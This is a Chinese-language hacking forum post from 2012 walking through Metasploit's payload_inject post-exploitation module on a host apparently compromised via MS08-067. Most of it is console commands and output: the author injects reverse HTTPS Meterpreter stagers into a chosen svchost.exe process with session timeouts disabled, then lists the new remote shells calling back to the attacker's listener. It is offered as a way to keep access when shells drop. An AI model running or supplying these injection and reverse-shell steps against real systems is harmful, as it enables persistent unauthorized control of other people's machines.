切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
191 Metasploit : 注入payload[复制链接]
发表于 2012-10-3 20:09:21 | 显示全部楼层 |!read_mode!
METASPLOIT的SHELL后门会在某些情况下中断,特别是DLL inject 和VNC GUI访问
在这里我们可以用payload inject再注入后门 先查看信息
  1. msf  exploit(ms08_067_netapi) > sessions -i 9
  2. [*] Starting interaction with 9...

  3. meterpreter > info post/windows/manage/payload_inject

  4.        Name: Windows Manage Memory Payload Injection Module
  5.      Module: post/windows/manage/payload_inject
  6.     Version: 14190
  7.    Platform: Windows
  8.        Arch:
  9.        Rank: Normal

  10. Provided by:
  11.   Carlos Perez <carlos_perez@darkoperator.com>

  12. Description:
  13.   This module will inject into the memory of a process a specified
  14.   windows payload. If a payload or process is not provided one will be
  15.   created by default using a reverse x86 TCP Meterpreter Payload.

  16. Module options (post/windows/manage/payload_inject):

  17.    Name     Current Setting                  Required  Description
  18.    ----     ---------------                  --------  -----------
  19.    HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
  20.    LHOST                                     yes       IP of host that will receive the connection from the payload.
  21.    LPORT    4433                             no        Port for Payload to connect to.
  22.    OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
  23.    PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
  24.    PID                                       no        Process Identifier to inject of process to inject payload.
  25.    SESSION                                   yes       The session to run this module on.

  26. meterpreter >
复制代码

在线我们来注入一个HTPPS后门试试
  1. meterpreter > run post/windows/manage/payload_inject PAYLOAD=windows/meterpreter/reverse_https,LHOST=192.1.1.100,LPORT=4114

  2. [*] Running module against DIS9TEAM-TESTIN
  3. [*] Performing Architecture Check
  4. [*] Process found checking Architecture
  5. [+] Process is the same architecture as the payload
  6. [*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 356
  7. [*] Opening process 356
  8. [*] Generating payload
  9. [*] Allocating memory in procees 356
  10. [*] Allocated memory at address 0x00780000, for 367 byte stager
  11. [*] Writing the stager into memory...
  12. [+] Successfully injected payload in to process: 356
  13. meterpreter >
复制代码

成功了 当然我们还能指定注入的进程等等 先查看进程
  1. meterpreter > ps

  2. Process list
  3. ============

  4. PID   Name              Arch  Session  User                          Path
  5. ---   ----              ----  -------  ----                          ----
  6. 0     [System Process]
  7. 1036  svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
  8. 1152  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
  9. 1396  svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
  10. 1448  svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
  11. 1500  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
  12. 1792  wscntfy.exe       x86   0        DIS9TEAM-TESTIN\dis9team      C:\WINDOWS\system32\wscntfy.exe
  13. 1920  VBoxTray.exe      x86   0        DIS9TEAM-TESTIN\dis9team      C:\WINDOWS\system32\VBoxTray.exe
  14. 1944  ctfmon.exe        x86   0        DIS9TEAM-TESTIN\dis9team      C:\WINDOWS\system32\ctfmon.exe
  15. 1996  explorer.exe      x86   0        DIS9TEAM-TESTIN\dis9team      C:\WINDOWS\Explorer.EXE
  16. 228   spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
  17. 4     System            x86   0        NT AUTHORITY\SYSTEM
  18. 408   smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
  19. 500   alg.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
  20. 532   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
  21. 560   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
  22. 776   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
  23. 788   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
  24. 984   VBoxService.exe   x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\VBoxService.exe

  25. meterpreter >
复制代码

注入到 1500 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe 里
  1. meterpreter > run post/windows/manage/payload_inject PAYLOAD=windows/meterpreter/reverse_https,LHOST=192.1.1.100,LPORT=4444,OPTIONS='SessionCommunicationTimeout=0,SessionExpirationTimeout=0,PID=1500'

  2. [*] Running module against DIS9TEAM-TESTIN
  3. [*] Performing Architecture Check
  4. [*] Process found checking Architecture
  5. [+] Process is the same architecture as the payload
  6. [*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1500
  7. [*] Opening process 1500
  8. [*] Generating payload
  9. [*] Allocating memory in procees 1500
  10. [*] Allocated memory at address 0x00a90000, for 367 byte stager
  11. [*] Writing the stager into memory...
  12. [+] Successfully injected payload in to process: 1500

  13. [*] 192.1.1.1:1172 Request received for /INITM...
  14. [*] 192.1.1.1:1172 Staging connection for target /INITM received...
  15. [*] Patched transport at offset 486516...
  16. [*] Patched URL at offset 486248...
  17. [*] Patched Expiration Timeout at offset 641856...
  18. [*] Patched Communication Timeout at offset 641860...
  19. [*] Meterpreter session 12 opened (192.1.1.100:4444 -> 192.1.1.1:1172) at 2011-12-21 17:11:24 +0800

  20. meterpreter >
复制代码

返回查看
  1. meterpreter > background
  2. msf  exploit(ms08_067_netapi) > sessions

  3. Active sessions
  4. ===============

  5.   Id  Type                   Information                                   Connection
  6.   --  ----                   -----------                                   ----------
  7.   10  meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-TESTIN         192.1.1.100:4444 -> 192.1.1.1:1055
  8.   11  meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-TESTIN         192.1.1.100:4444 -> 192.1.1.1:1110
  9.   12  meterpreter x86/win32  NT AUTHORITY\LOCAL SERVICE @ DIS9TEAM-TESTIN  192.1.1.100:4444 -> 192.1.1.1:1172
  10.   9   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-TESTIN         192.1.1.100:4444 -> 192.1.1.1:1037

  11. msf  exploit(ms08_067_netapi) >
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-6 10:09

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部